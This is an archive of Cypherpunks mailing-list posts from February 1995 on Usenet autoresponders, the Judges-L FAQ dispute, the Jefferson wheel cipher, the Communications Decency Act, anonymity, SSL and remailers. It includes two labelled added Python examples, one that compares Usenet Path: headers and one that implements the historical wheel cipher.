Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EFN Autoresponder <usenet@news.efn.org>
Date: Wed, 8 Feb 95 13:42:02 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <9502082141.AA28209@mars.efn.org.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT PANIC!  REMAIN CALM!  READ *ALL* OF THIS MESSAGE BEFORE GETTING UPSET!

Your Usenet test article was received here at the news gateway machine 
for Oregon Public Networking, located in Eugene, Oregon, USA.
The OPN newsadmins can be reached via e-mail at usenet@news.efn.org.  Please 
note that we do not offer news access to sites outside of our 
organization.

If you're a newsadmin and you'd like to run your own autoresponder, this one
is available from ftp://ftp.cccd.edu/pub/usenet/innautorespond.

Or you can just ask us to mail you a copy.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

There are typically 5 possible reasons why you were sent this e-mail message:

1) You intentionally posted a Usenet news article to a *.test newsgroup.  
These newsgroups exist so you can verify that your articles are being 
propagated correctly.  When your article arrives here, we send you this message
as confirmation.  We will only send you ONE e-mail reply for each of your test
articles that we see.

2) You unintentionally posted a Usenet news article to a *.test newsgroup.  
This is a bit of net.childishness caused by a Followup-To: header directing all
replies into a *.test newsgroup.  This is done by somebody upset with the
content of a discussion thread who wants to "punish" anybody who replies to his
message.  Your reply will be sent to *.test instead of the original newsgroup,
and you will start receiving autoresponder messages similar to this one that
you didn't ask for.  To avoid this in the future, look for a Followup-To:
header and make sure it's appropriate before replying to any articles.

3) You were a victim of a Reply-To: header directing your e-mail into a *.test
newsgroup via a mail->news gateway.  Similar to 2) above.

4) Somebody has forged a posting in your name to one of the *.test newsgroups.
To avoid this in the future, use better net.etiquette and you will make fewer
net.enemies.  If you want to try and identify the forger, use the following
procedure.  Make a legitimate posting to the same *.test newsgroup that the
forger used.  We will send you an e-mail reply.  Compare the Path: header from
this legitimate reply with the Path: header from the forgery.  The front
part of the two headers will be the same or topologically similar path to
your site.  Where the forged header becomes substantially different can
provide clues to where the forger lives.  Note that if you receive multiple
newsfeeds you may need to repeat this process several times so you can discover
all legitimate paths between our site and yours.  Once you think you've
identified the forger's site, try sending POLITE e-mail to the newsadmin/
sysadmin/postmaster explaining the situation.

5) You issued a cancel control message to a *.test newsgroup.  Some users
dislike autoresponses for cancel messages, but the newsadmins here think it
can be a valuable diagnostic tool for verifying cancel propagation.  If you
don't like it, use the "delete" key in your mail client!

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

Path: mars.efn.org!cs.uoregon.edu!news.uoregon.edu!vixen.cso.uiuc.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test
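
[Added example, not part of the autoresponder's message: the Path: comparison from item 4 above, written out for the case of several legitimate newsfeeds. All host names are constructed; the suspect path is compared hop by hop against each known-good path from the same autoresponder, and the best match shows where the two routes part.]

```python
def hops(path_header):
    """Split a Path: header (with or without the 'Path:' label) into hops."""
    value = path_header.strip()
    if value.lower().startswith("path:"):
        value = value.split(":", 1)[1]
    return [h for h in value.strip().split("!") if h]


def shared_prefix(a, b):
    """Number of leading hops two paths have in common."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def locate_divergence(suspect_path, legit_paths):
    """Compare a suspect Path: against every known-good Path: to our site.

    Returns the hops shared with the closest legitimate path, the remaining
    hops of the suspect article (the region to look at), and the remaining
    hops of that legitimate path for comparison.
    """
    if not legit_paths:
        raise ValueError("need at least one legitimate Path: to compare with")
    suspect = hops(suspect_path)
    best = max((hops(p) for p in legit_paths),
               key=lambda legit: shared_prefix(suspect, legit))
    n = shared_prefix(suspect, best)
    return {
        "shared": suspect[:n],
        "suspect_tail": suspect[n:],
        "legit_tail": best[n:],
    }


# Constructed sample data: two legitimate feeds and one suspect article,
# all as seen by the same autoresponder (responder.example).
LEGIT = [
    "Path: responder.example!hub1.example!backbone.example!feedA.example!mysite.example!not-for-mail",
    "Path: responder.example!hub2.example!backbone.example!feedB.example!mysite.example!not-for-mail",
]
SUSPECT = "Path: responder.example!hub1.example!backbone.example!regional.example!othersite.example!not-for-mail"

if __name__ == "__main__":
    result = locate_divergence(SUSPECT, LEGIT)
    print("shared hops      :", "!".join(result["shared"]))
    print("suspect continues:", "!".join(result["suspect_tail"]))
    print("legit continues  :", "!".join(result["legit_tail"]))
```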




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 8 Feb 95 13:44:12 PST
To: "Craig A. Johnston" <caj@tower.techwood.org>
Subject: Re: Judges-L FAQ
In-Reply-To: <199502082043.MAA21652@tower.techwood.org>
Message-ID: <199502082143.NAA20893@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Craig A. Johnston" <caj@tower.techwood.org> writes:
> 
> It has come to my attention that the Judges-L FAQ is being distributed
> by someone who obtained it on this list, and being sent to people made
> to look as if it has issued from David Stodolsky.  

> I must inform you that this FAQ is copyrighted material, and 
> you are requested not to distribute it. 

A version of this FAQ with Message-ID <01050105.hhv9l1@arch.ping.dk> was
posted from Stodolsky's machine in Denmark on 17 Dec 94 by
judges@arch.ping.dk to news.admin.* and misc.legal, asking for feedback
and asking for no distribution restrictions.  IANAL, but it looks to me
like your genie's out of the bottle.

	Jim Gillogly
	Highday, 18 Solmath S.R. 1995, 21:35




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.techwood.org>
Date: Wed, 8 Feb 95 13:59:01 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: To clear this up.
Message-ID: <199502082158.NAA00214@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text



Something needs clearing up:

I am not a Judges-L sympathizer.  The previous message was posted
at the request of David Stodolsky.  I am subscribed to the list to
see what is going on.  I find the idea of the Judges-L to be repulsive,
personally, as I have told DS and others.

I saw no harm in relaying this message to the list.  All it is likely
to do is create more anti-Judges-L sentiment.  David Stodolsky
claims that they have no desire to hide their FAQ, but that he wishes
for it to be distributed in a controlled fashion.  

To engage in what I deem "fair use": "...disclosure in the wrong context,
or at the wrong time can cause trouble..."

A beaut.

In sum, I find Judges-L repulsive and plan to keep an eye on it.

-Craig Johnston




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 8 Feb 95 14:11:03 PST
To: "Craig A. Johnston" <cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: Judges-L FAQ
Message-ID: <v03001409ab5ef19cb7c7@[140.174.229.204]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:43 2/8/95, Craig A. Johnston wrote:

>I must inform you that this FAQ is copyrighted material, and
>you are requested not to distribute it.

What good is a FAQ if you can't distribute it?  The judges are confused in
more ways than one.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 8 Feb 95 14:11:36 PST
To: kkirksey@world.std.com (Ken Kirksey)
Subject: Re: Jefferson Wheel Cypher
In-Reply-To: <199502082012.AA18336@world.std.com>
Message-ID: <199502082211.OAA21023@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


Isn't that the same as Bazeries' Cylinder Cipher, where you have a bunch of
disks with mixed alphabets around the edges, you put them on a rod in some
order, set the plaintext along a row, then read the ciphertext off any
other row?  If so, a short paper of mine was just printed in "The
Cryptogram" (JF95 issue) about cryptanalyzing it.  A US military field
cipher was based on the Jefferson version; I handled a copy (with metal
disks) in the National Cryptologic Museum just outside Ft. Meade last
summer.  There may even be an Aegean Park Press publication on it.  The
servicemen hated it -- fiddling with all the disks in the heat of battle
made it cumbersome for tactical use.

If it's as I describe, I'd call it a multiple-key polyalphabetic: keyed
alphabets, keyed order, and (potentially ambiguous) offset key for
deciding how far around the cylinder to go.  The period is how many disks
you have, since they stay in the same order (but with different relative
offset) for the whole message.  It's not really an autokey under the
Meaning of the Act, since there's no feed-forward from one letter to the next.

I'm sure Kahn's "The Codebreakers" will have more info.

	Jim Gillogly
	Highday, 18 Solmath S.R. 1995, 21:59
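
The cylinder described in the message above, as an added example that is not part of the original post. The disk alphabets are constructed by shuffling (they are not Jefferson's or Bazeries' historical alphabets), and the names make_disks, transform and candidate_rows are assumptions of this sketch, which uses one offset for the whole message.

```python
import random
import string

ALPHA = string.ascii_uppercase


def make_disks(n, seed):
    """Constructed key material: one shuffled A-Z alphabet per disk."""
    rng = random.Random(seed)
    return ["".join(rng.sample(ALPHA, 26)) for _ in range(n)]


def transform(text, disks, order, offset):
    """Set `text` along one row of the cylinder and read the row that lies
    `offset` steps further round.  Letter i is handled by the disk in
    position i mod len(order), so the period equals the number of disks."""
    period = len(order)
    out = []
    for i, ch in enumerate(text):
        disk = disks[order[i % period]]          # keyed order of keyed alphabets
        out.append(disk[(disk.index(ch) + offset) % 26])
    return "".join(out)


def encrypt(plain, disks, order, offset):
    if not 1 <= offset <= 25:
        raise ValueError("offset 0 would just copy the plaintext row")
    return transform(plain, disks, order, offset)


def decrypt(cipher, disks, order, offset):
    return transform(cipher, disks, order, -offset)


def candidate_rows(cipher, disks, order):
    """A receiver who does not know the offset sets the ciphertext on one row
    and reads the other 25; the plaintext is whichever row makes sense."""
    return [transform(cipher, disks, order, -k) for k in range(1, 26)]


def changed_positions(a, b):
    """Positions where two equal-length strings differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


if __name__ == "__main__":
    disks = make_disks(10, seed=1995)            # constructed sample key
    order = [3, 0, 7, 9, 1, 5, 2, 8, 6, 4]
    ct = encrypt("CYPHERPUNKSWRITECODE", disks, order, 7)
    print(ct, decrypt(ct, disks, order, 7))
    # Same letter 20 times: the ciphertext repeats every 10 letters.
    print(encrypt("E" * 20, disks, order, 7))
```
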




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Wed, 8 Feb 95 11:25:17 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502072138.aa29510@hermix.markv.com>
Message-ID: <Pine.LNX.3.91.950208142556.7197B-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Feb 1995 jpp@markv.com wrote:

> Uh oh!  Egg on my face.  Will someone explain to me how the amendments
> in S.314 make owners of ISPs or other computer systems liable for
> 'bad' data?  I apologize for my previous uncalled for (so it seems to
> me now) ranting.

Sure, read on:

>    (a) Prohibited acts generally
>    
>    Whoever -
>    
>    (1) in the District of Columbia or in interstate or foreign
>    communication by means of [telephone] telecommunications
>    device -
>    
>    (A) [makes any comment, request, suggestion or proposal] 
>    makes, transmits, or otherwise makes available any comment,
>    request, suggestions, proposal, image, or other communication]
>    which is obscene, lewd, lascivious, filthy, or indecent;

Here's an important bit. "Transmits or otherwise makes available" is 
different from the earlier law. It DOES place a burden of responsibility 
upon the provider of service. NOTE that unlike other portions of the law, 
both old and new versions, this part DOES NOT include the word 
"knowingly". Crucial, crucial point.

>    (B) [makes a telephone call, whether or not conversation
>    ensues, without disclosing his identity and with intent to
>    annoy, abuse, threaten, or harass any person at the called
>    number] makes a telephone call or utilizes a telecommunications
>    device, whether or not conversation or communications ensues,
>    without disclosing his identity with intent to annoy, abuse,
>    threaten, or harass any person at the called number or who
>    receives the communication;

No anonymous annoying! Does this mean we can't raid IRC channels anymore? 
Or flame people from anon.petit.fi (sp?) accounts?



- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Wed, 8 Feb 95 11:28:49 PST
Subject: Re: Full text of S. 314
In-Reply-To: <Pine.SV4.3.91.950208022428.26104C@mirage.skypoint.com>
Message-ID: <Pine.LNX.3.91.950208142947.7197C-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Samuel Kaplin wrote:

> I would suggest that everyone forward this to their ISP. It has a direct 
> bearing on them and most won't be aware of it.

This is exactly what I did here in NYC.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Wed, 8 Feb 95 14:44:03 PST
To: eric@remailer.net (Eric Hughes)
Subject: RE: a new way to do anonymity
Message-ID: <199502082243.AA19005@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> I'd suggest just getting something running first, to get some
> prototyping experience.

Now that I've just spent some time compiling and playing with Matt's ESM
program, it seems almost perfectly suited for prototyping Pipe-Net 
since you can use it to do nested encryption.  All that's needed is 
to hack it so that it implements link encryption (i.e., send a
constant stream of random data in between keypresses).

This is what the user would do: (LESM for Link Encrypted Session Manager)
lesm -l
lesm -l
login to server 1
lesm -s
lesm -l (or better yet take over a free LESM session already running
		 between server 1 and server 2)
login to server 2
lesm -s
lesm -s

I wonder if Matt has the time and interest to do this...  If not then I 
guess I can try, but I've never done real crypto programming before...

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzlIdDl0sXKgdnV5AQFKuwQAqhJulKWcPV8GWUM11+2zonT+EQ8q18YV
TAymUlhjuYo0csHP/nmoMDRpf/9veISdBQE/GlRkc1k0JsWpPBD0+6e0nA7kCTMO
xqVoXdM3F/qN31CXjMT9rgAanIXFat2Ox3bjT3g07ReaN372TPnGGvNauxO69Z52
kvWajSSXiSY=
=yF/i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 8 Feb 95 11:48:24 PST
To: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Subject: Re: skronk
In-Reply-To: <9502081137.ZM28317@warp.mcom.com>
Message-ID: <9502081947.AA10312@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I agree with much of what you say until you hit this:

"Kipp E.B. Hickman" says:
> You are right here. However, our observation is that an interesting chunk of
> the world is moving towards using X.509 based certificate infrastructures for
> many things.

Like who? Certainly not the internet standards people, no matter what
certain people might tell you. The X.509 body may still be twitching
but I don't think its heart is beating any longer.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 8 Feb 95 11:55:34 PST
To: kipp@warp.mcom.com (Kipp E.B. Hickman)
Subject: Re: skronk
In-Reply-To: <9502081137.ZM28317@warp.mcom.com>
Message-ID: <199502081954.OAA22660@bwface.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Will there be a commercially licensed version, so that things
built on SSL can be used in freeware and payware?  (Like the recently
announced commercial version of RSAREF)

	Actually, make that "When will there be.." since otherwise SSL
will be yet another standard one company uses.  Such standards are
less than useful.

Adam


Kipp wrote:

| > Please beat your lawyers to a pulp, until they make it useful for us.
| > If I can't create generally useful things with it, and share it with
| > thousands of others on the net for free, it's not going to be used by
| > the cypherpunk community.
| >
| > I recommend you put your reference implementation in the public domain
| > (except for the RSAREF component).  Or take Matt Blaze's crypto
| > offerings from AT&T as your model.
| 
| The implementation will be out very shortly (it's already done and working). It
| will be free for non-commercial usage, so hopefully most of the cypherpunks
| will be happy (if there is such a state of affairs mind you :^)
| 
| We won't be having any of the copy-leftish stuff that is in the
| RSAREF license - like not fiddling with the api, and having to give
| us back your hacks using it...Of course we want to hear about what
| people are doing with it (that's another purpose for the ssl-talk
| mailing list). 


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Wed, 8 Feb 95 12:09:54 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <9502081137.ZM28317@warp.mcom.com>
Message-ID: <199502082006.PAA21801@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9502081137.ZM28317@warp.mcom.com>,
Kipp E.B. Hickman <kipp@warp.mcom.com> wrote:
>You are right here. However, our observation is that an interesting chunk of
>the world is moving towards using X.509 based certificate infrastructures for
>many things. 

AFAIK, the only interesting chunk is those corps that want some form of
"True Name" (and PKP/RSADSI, of course).

Everybody else hates them with a passion.  The Hastur crypto toolkit will
support them, but they'll be viewed as special cases of web-of-trust
signed keys with time-outs.
- --
Todd Masco     | "Change is not only necessary, it is inevitable."
cactus@hks.net |                          - Frank Zappa
     Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzkkGCoZzwIn1bdtAQE6BAF+LLnnx8PG3kIHOmK7kcXoKEThYeXtZgG2
Ke9yqab4kXHMyMSlAPT94P1eicQvhWDJ
=BC1t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkirksey@world.std.com (Ken Kirksey)
Date: Wed, 8 Feb 95 12:12:35 PST
To: cypherpunks@toad.com
Subject: Four Horsemen
Message-ID: <199502082012.AA18319@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Message-Id: <v01510101ab5ecb0e67cd@DialupEudora>

-----BEGIN PGP SIGNED MESSAGE-----

Just a quick question:  someone asked me the other day what the "Four
Horsemen of the Infocalypse" were, and I told him

  1) Drug Dealers
  2) Terrorists
  3) Pedophiles
  4) Pornographers

Did I get it right, or did I have a synaptic misfire somewhere along
the line?

Ken

= Ken Kirksey            And the Clinton administration launched an attack on =
= kkirksey@world.std.com  people in Texas because those people were religious =
= Mac Guru & Developer    nuts with guns.  Hell, this country was founded by  =
=                         religious nuts with guns.           - P.J. O'Rourke =

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzkbhOsZNYlu+zuBAQHVigQAzkp3fIlEfT82zSaRZPkIqkkaDJ5MNyRK
SOOq0QwAMB1/bGNGda0plC+aNGT1RnSpNJTS/8ISIJTDCwbmJGFYGxvRSgqyUkXO
dQrd6pLbYIxH1sTPIaAoM4BnmUhYzr5L4TauPgqTLYhqGKDa8RWbHggjLyTr/UfF
drRgBOM919Q=
=OcUi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkirksey@world.std.com (Ken Kirksey)
Date: Wed, 8 Feb 95 12:12:36 PST
To: cypherpunks@toad.com
Subject: Jefferson Wheel Cypher
Message-ID: <199502082012.AA18336@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Message-Id: <v01510103ab5ed2c136c8@DialupEudora>

-----BEGIN PGP SIGNED MESSAGE-----

A couple of questions regarding Thomas Jefferson's Wheel Cipher:

1) How would you classify this cipher?  It looks to me like a polyalphabetic
   with the plaintext also being the key, kind of like an autokey.  Am 
   I correct, or is this cipher a different animal entirely?

2) Can anyone point me to references on the cryptanalysis of this cipher?
   
Many thanks in advance,

Ken

= Ken Kirksey            And the Clinton administration launched an attack on =
= kkirksey@world.std.com  people in Texas because those people were religious =
= Mac Guru & Developer    nuts with guns.  Hell, this country was founded by  =
=                         religious nuts with guns.           - P.J. O'Rourke =

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzkjt+sZNYlu+zuBAQEwPgP/XMWm/qDr1A0D49iBJdYNOX18j3DNbBvG
xTOvSrzNziq9jq4026+TNpM3+PVGiji85yL3053jG26I0dJbckkVFr1PBfXmLrua
nHBt5t/qy7RSvjsW80ZreeqVKwulo3NtT+XuWjU7EXZDSPUZts4JuHnGdlqQRiMo
1ERDP4+StM0=
=PcEo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkirksey@world.std.com (Ken Kirksey)
Date: Wed, 8 Feb 95 12:12:41 PST
To: cypherpunks@toad.com
Subject: Re: Seals and Sealing Waxes
Message-ID: <199502082012.AA18329@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Message-Id: <v01510102ab5ecd95ffb0@DialupEudora>

-----BEGIN PGP SIGNED MESSAGE-----

> "All crypto is economics," and this is what made seals and sealing wax so
> useful for so long. Saying "seals were duplicatable from the start" does
> not mean this feat was easy, even if technically possible.
> 
> In fact, the fine details produced by a good seal are hard to exactly
> emulate with a copy. Even on a two-dimensional surface. And with the advent
> of three-dimensional surfaces, which sealing wax made possible, the fine
> detail of a good seal was in fact very hard to forge.

But not impossible.  According to Kahn, the Austrian Black Chamber was
quite adept at forging seals in the late 1600's / early 1700's.  They
were able to take sealed correspondence in at 7 a.m., unseal it, copy the
message, re-seal it, and have it back in the postal stream by early
afternoon.  There was only one recorded case of them re-sealing a message
with the wrong seal, and that was because the seals were so similar.

All this is from memory, since I don't have my copy of _The Codebreakers_
here at work, so I may be off in some details.

Ken

= Ken Kirksey            And the Clinton administration launched an attack on =
= kkirksey@world.std.com  people in Texas because those people were religious =
= Mac Guru & Developer    nuts with guns.  Hell, this country was founded by  =
=                         religious nuts with guns.           - P.J. O'Rourke =

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzkeVusZNYlu+zuBAQG5HgP+LuE0aOG6UxgZp/IrZCm2y9ESi9AT13v+
ePMulQHUXUv8cc4m0RTjD35+cmKSKADrP6L1oC6BCia+5d3Rhidh2KcqaoQZQLvc
rSuXbPgUpM7VJBOELtxc68CLJTpyaHBHvORJ//xH+/kN/++2f110+hZMwvgynrRd
Pj54hvqthKA=
=Jhff
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 8 Feb 95 13:31:05 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Wiretaps & terrorism
Message-ID: <199502082130.QAA23309@bwface.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	(Why the FBI doesn't really need wiretaps)
	(Part of a continuing series)

From today's (Feb 8) Boston Globe, page 3
by Larry Neumeister, AP

	New York- the FBI was on the trail of three of the World Trade
Center bombers nearly four years before the explosion that killed six
and injured 1,000, the government said yesterday.

	In evidence presented at the trial of Sheik Omar Abdel-Rahman
and 10 others, the FBI also said it had bugged the Sheik's phone a
week before the blast.

	The surprising testimony - a day after a key defendant switched
sides - indicated that the government had more extensive knowledge of
the planning for the trade center bombing than it had acknowledged.
And it raised anew questions about why the FBI was unable to prevent
the 1993 bombing, one of the most serious terrorist actions in the
United States.

	...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Wed, 8 Feb 95 14:52:06 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
Message-ID: <9502082251.AA03118@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:

>I can see that putting remailer commands into a specific part of a MIME
>multipart message has some advantages.  Right now we are basically
>having the remailing commands be mail header fields.

>OTOH it does have the advantage that it is easy to do, at least with the
>"::" pasting token idea (which perhaps would need to be documented in its
>own right).

IMHO, an ideal message would have the ability to handle nested objects
of varying types, MIME is only a start. To construct a unique format
for remail_messages is reasonable, perhaps even preferable. But of
course, MIME *could* be a start, in a brown'n'serve roll sort of way.

However, with a proprietary approach,
what to use for delimiters, or quasi-parentheses (in the case of n
layers of nesting, encrypted or unencrypted) needs extensive and
careful consideration. This is the same dilemma many developers face
with document-centric interfaces and their plethora of odd-bird formats.

I say take the remail stuff out of the header altogether,
MIME or not.

----------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 8 Feb 95 13:38:00 PST
To: "Craig A. Johnston" <caj@tower.techwood.org>
Subject: Re: Judges-L FAQ
In-Reply-To: <199502082043.MAA21652@tower.techwood.org>
Message-ID: <9502082137.AA10512@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Craig A. Johnston" says:
> 
> It has come to my attention that the Judges-L FAQ is being distributed
> by someone who obtained it on this list, and being sent to people made
> to look as if it has issued from David Stodolsky.  
> 
> I must inform you that this FAQ is copyrighted material, and 
> you are requested not to distribute it. 

If the material is not actually registered with the copyright office,
I'll point out that at most you can get the distribution stopped, but
cannot get damages for the distribution. Unless you actually intend to
spend substantial sums on lawyers, you are unlikely to be able to do
even this much.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@tis.com>
Date: Wed, 8 Feb 95 13:53:46 PST
To: jpp@markv.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502082023.MAA00749@comsec.com>
Message-ID: <9502082149.AA28226@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Sender: owner-cp-lite@comsec.com
>X-Signed: PGP-Detached-2-3,
>   iQBXAwUBLzhSutC3U5sdKpFdAQEEqwIMCg1PFWC19WuW2BhwmzUyg84RthT/61x9
>   vLrIPbgrYcCXCNB8F51tQogs5lBrry/aOk2Fk3Izl//XC4KDl+cADrCz
>Date: Tue, 7 Feb 95 21:24:01 PST
>From: jpp@markv.com

>of the very most important rights.  To hold the owner of a bulletin
>board responsible for the illegal messages posted to it, is to force
>the bulletin board owner to become a government censor in all but name
>(and wages).

anyone heard of "no unfunded mandates" ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 8 Feb 95 14:04:36 PST
To: rah@shipwright.com
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <v01510103ab5eaa4305cf@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 PM 2/8/95, Robert Rothenburg Walking-Owl wrote:
>Of course geographic community standards are problematic too with
>telecommunications since postal inspectors from Tennessee can call
>up adult bulletin boards in California...

This reminds me of a joke I finally grew tired of, prescient though it may
have been given current legal events in Tennessee:

        It's illegal in Cambridge to smoke in Boston...

Most non-smokers, especially the reformed-smoker non-smokers, didn't think
that that one-liner was very funny. Most small-l libertarians had a hoot or
two about it though.  (Just like the punchline about how many radical
feminists it takes to screw in a lightbulb [A: That's really *not* funny.])


I guess I'll sit down now...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 8 Feb 95 17:16:59 PST
To: cypherpunks@toad.com
Subject: The drumbeat against anonymity continues....
Message-ID: <199502090115.RAA22929@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In addition to the articles and editorials, I'm seeing articles
slamming anonymity and pseudoanonymity (we need a better word!) in
business contexts.

See the latest RISKS Digest (16.79, available on Usenet in the group
comp.risks) for a couple of articles of interest. One is about the
Singapore plans for an automatic vehicle identification (AVI) system
to implement "road pricing" on congested roads. Phil Agre's article
makes some good points, and mentions using digital cash to avoid the
Big Brother problems, but notes that Singapore is not seriously
considering it.

The real "drumbeat" article is about cellular phone fraud and
toll-free number fraud. Actually, a couple of related articles.
(Everyone should at least skim "RISKS.")

Anonymity is cited as a problem. But this misses the point, that the
real problem is lack of a proper payment model. As David Chaum points
out, there are really only two basic payment approaches: transfer of
something of value or an account-based transfer. Cash or barter are
examples of the first, checks or credit card payments are examples of
the second (though each has some wrinkles). Digital cash, when online
cleared, behaves mostly like real cash.

The phone companies that are complaining about fraud have inadequately
arranged for security and need to adopt a mode that fixes this. Since
physical money can't be fed into the slots of a handheld cell phone (or
at least can't then be delivered to the service owner!), the solution
has traditionally been an account-based payment system. (Accounts can
also be better protected against fraud by having PINs, etc.)

What about telephone calling cards? I don't recall the details well
enough to know if they could be used on handheld units. Maybe they
could be used.

This could eventually be a market for digital cash. (If fraud is a
serious-enough problem, costing enough, then a service which could
lower costs by using digital cash could make market inroads.)

What we need to watch out for are proposals to limit anonymity, to
mandate national ID cards, so as to somehow limit such cases of fraud.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





